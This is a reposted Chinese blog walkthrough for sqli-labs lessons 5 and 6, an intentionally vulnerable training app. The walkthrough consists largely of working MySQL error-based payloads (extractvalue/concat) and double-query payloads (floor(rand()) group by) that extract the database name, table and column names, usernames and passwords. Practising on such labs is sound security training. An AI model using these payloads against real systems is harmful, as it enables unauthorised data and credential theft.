sqli lab less-5-6 - 走看看

zoukankan html css js c++ java

sqli lab less-5-6
less-5
1. 基于报错的注入
- 基于报错可以爆出当前数据库名等等
  id=2’ and extractvalue(1, concat(0x7c,(select user())));-- #
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select @@version)));-- #
  
  ?id=2’ and extractvalue(1, concat(0x7c,(select database())));-- #
- 爆当前数据库表
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(table_name) from information_schema.tables where table_schema=database()
  )));-- #
- 爆字段
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(column_name) from information_schema.columns where table_name=‘users’
  )));-- #
- 爆数据
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(username) from users
  )));-- #
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select group_concat(password) from users
  )));-- #
- 这种方式爆出数据较少,可能爆不出想要的数据
1. 双查询注入
  原理:https://www.2cto.com/article/201303/192718.html
?id=2’ union select 1,count(*), concat((
select password from users limit 2,1
), floor(rand()*2))as a from information_schema.tables group by a;
– #
修改limit
可以一条一条的爆出信息
- 上面基于xpath报错的函数也可以一条一条爆出信息
  ?id=2’ and extractvalue(1, concat(0x7c,(
  select password from users limit 1,1
  )));-- #
less-6

同上 " 闭合
查看全文

相关阅读:
驱动模块和装模块的概念——Junit单元测试案例
 虚拟机配置Openstack常见问题汇总
 Ubuntu配置OpenStack 二：配置时间同步NTP和安装数据库Maridb以及问题总结
 Ubuntu配置OpenStack 一：主机环境配置以及问题总结
 Eclipse连接SQL Server 2008数据库以及问题总结
 linux信号与trap命令
 shell之数组
 wget下载命令与功能更强大的 curl 文件传输命令
 RSync 文件备份同步
 rhel7和centos7的新防火墙软件　firewalld

原文地址：https://www.cnblogs.com/l0nmar/p/12553820.html

Copyright © 2011-2022 走看看